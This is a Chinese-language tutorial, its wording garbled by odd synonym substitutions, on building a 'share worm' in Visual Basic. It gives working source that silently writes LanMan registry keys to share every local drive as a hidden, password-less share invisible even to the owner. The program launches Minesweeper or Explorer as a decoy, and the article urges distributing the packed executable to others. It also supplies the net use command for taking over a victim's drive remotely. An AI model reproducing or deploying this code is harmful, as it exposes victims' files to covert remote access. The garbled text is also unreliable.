共享蠕虫的原理及用VB编程的实现方法

作家:花露水百合                 vb是一个特殊"优美"的编制程序谈话，起码我是这么觉得的。因为有二：其一是，vb的英文名不妨证明为very beautiful,这是vb的"美";其二是，"好"字的五笔输出码是什么？"vb"是也，这即是我所谓的vb的"好"。嘻嘻，如许的证明够cool吧！     但实物都是有两面性的,这么美的谈话在有些人员里却成了搞"妨害"的东西,被用来编写宏病毒.迩来搜集上的百般宏病毒不足为奇，个中有十分一局部即是vb的佳构.比拟有代办性的是共享蠕虫宏病毒.即日咱们就来让它现出究竟!     所谓的共享蠕虫的宏病毒(network.vbs)，它体积不只玲珑(惟有1k)， 并且很具备妨害性！只有被这个宏病毒熏染了的呆板，一切的硬盘就会被实足共享，而且不妨在局域网和因特网中传递。底下咱们先谈谈它的道理。     咱们领会，把一个目次树立为共享的功夫，即使在共享名反面加上$ 标记，那么这个目次将形成一个隐含的共享目次，即对方的呆板上看不见这个共享目次。然而即使对方领会共享目次名，仍旧是不妨考察的，只有在这个目次反面加上$ 标记就不妨了。     固然对方看不见这个共享目次，然而本人是不妨瞥见的。如许也是不行的，固然咱们仍旧加上$ 标记，然而咱们仍旧不妨创造这个共享目次的图标底下仍旧加上了一个小手，表白这个目次仍旧被树立为共享。如许运用者就会领会呆板被人变换过了。而共享蠕虫的巧妙之处就在乎：不只是对方看不见这个共享目次，并且连本人也是看不见这个共享目次的，如许就不妨做到神不知，鬼不觉了。当你把这个步调发过对方，对方实行完此后，对方的呆板就会被十足被共享，而对方却不领会。     做到对方看不见很简单，只有在共享目次名反面加上$ 符就不妨了；而共享蠕虫步调是如何做到连本人也看不出来的呢？本来原因说出来也是很大略的，神秘就在备案表中。请看底下的例子：     1.运转regedit吩咐，翻开备案表；     2.找到底下的子键     hkey_local_machinesoftwaremicrosoftwindowscurrentversionnetworklanmanc$     3.在屏幕的右边，你不妨瞥见底下的实质；     flags 0x00000302(770)     parm1enc (长度为零的二进制值)     parm2enc (长度为零的二进制值)     path "c:"     remark "remark by scent lily"     type 0x00000000(0)     要害的场合即是flag这个参数，它的键值确定了共享目次的典型。咱们把flags的值设为302(16进制)就不妨了。     领会道理此后，用vb体例共享蠕虫的本领就很大略了，大概的办法如次：     1.用getdrivetype因变量检验和测定呆板从c盘发端的一切启动器。软驱我想就不用共享了，没有什么本质意旨的！     2.将找到的每一个启动器反面加上$ 符动作一个子键(c$,d$,e$)，写入备案表的lanman子键下；     3.将每一个子键的"flags"值树立为302(16进制)；     4.将"path"树立成相映的路途；即使承诺，你不妨对"remark"举行树立，比方，"某某到此一游了！"，如许就ok了;     4.即使你还想让步调更湮没一点，你不妨在步调运转的功夫，先实行一个步调，比方排雷、空当接龙，大概找开登记本、资源处置器之类。如许，对方就更不简单看破了！     底下讲一下步调的要害局部     option explicit     dim windir as string     const commonpath = "softwaremicrosoftwindowscurrentversionnetworklanman"          private sub form_load()     me.hide     dim buff as string, driveno as integer, result as integer, game     for driveno = 0 to 25 解释：遍历一切的26个启动器     buff = chr$(65 + driveno) + ":" 解释：取启动器符     result = getdrivetype(buff) 解释：挪用api因变量来赢得启动器的典型     if result = 3 xor result = 5 then     setvalue hkey_local_machine, commonpath + chr(65 + driveno) + "$", "flags", reg_dword, "770", 3 解释：写入共享的典型，这即是步调的要害地方     setvalue hkey_local_machine, commonpath + chr(65 + driveno) + "$", "type", reg_dword, "0", 0     setvalue hkey_local_machine, commonpath + chr(65 + driveno) + "$", "path", reg_sz, buff, 4 解释：写入共享启动器的路途，即是"c:","d:"之类     setvalue hkey_local_machine, commonpath + chr(65 + driveno) + "$", "parm2enc", reg_binary, 0, 0 解释：写入共享目次的只读考察暗号；     setvalue hkey_local_machine, commonpath + chr(65 + driveno) + "$", "parm1enc", reg_binary, 0, 0 解释：写入该共享目次的实足考察暗号；；     setvalue hkey_local_machine, commonpath + chr(65 + driveno) + "$", "remark", reg_sz, "remark by scent lily!", 21 解释：写入少许解释消息，比方“花露水百合到此一游”     end if     next driveno     getwindir 解释：赢得windows目次的路途     if dir(windir & "winmine.exe") <> "" then 解释：即使有排雷游戏的话就在前台实行它     game = shell(windir & "winmine.exe", vbmaximizedfocus)     else     解释：由于排雷游戏不是必装的，大概有的呆板没有安置，然而资源处置器是确定有的。以是，即使没有排雷游戏 就启用一个资源处置器     game = shell(windir & "explorer", vbmaximizedfocus)     end if     unload me     end sub          public sub getwindir() 解释：赢得windows地方目次的子步调     dim length as long     windir = string(max_path, 0)     length = getwindowsdirectory(windir, max_path)     windir = left(windir, instr(windir, chr(0)) - 1)     end sub     完备的步调大师不妨去网左右载(花露水百合园http://scentlily.y365.com)，个中的可实行文献是用vb6.0编写翻译的，倡导再用vb5.0从新编写翻译一下。如许你只须要将这一个可实行文献散发给旁人就ok了，不须要其它的任何dll文献，由于win98和win2000仍旧自带vb5.0的dll文献啦。如许就做出了一个绿色软硬件。你再用upx这个可实行文献收缩东西收缩一下，就惟有6k了，发觉很爽吧！     有很多伙伴来函问我，即然对方和本人都看不见这个共享目次，那究竟如何运用呢？本来本领也很大略的，由于在网上街坊里是看不见的，以是咱们须要到dos办法下来运用。吩咐如次：     语法：net use <映照的盘符> \对方的ipc$     比方：net use x: \192.168.0.2d$     实行完这个吩咐此后，就将对方(192.168.0.2)的d盘映照成本人的x盘了。你就不妨象运用c盘d盘那么运用x盘了，当你切换到x盘后，对x盘所举行的操纵，本质上即是对方的d盘举行操纵。     由于此刻的网友都仍旧很少承诺接受可实行文献了，以是网上时髦的共享蠕虫步调是vbs方法的脚步谈话。然而道理是一律的，不过实行的本领不一律结束！     如何样！在旁人呆板上舞蹈的发觉怎样？一句话，"十足尽在控制！"，领会花露水百合干什么用爱立信手机了吧！:)然而，仍旧要指示你一句，看看就不妨了，开恶作剧也没题目,然而万万不要搞妨害！由于vb是最"优美"的谈话,不要妨害了她的优美局面噢！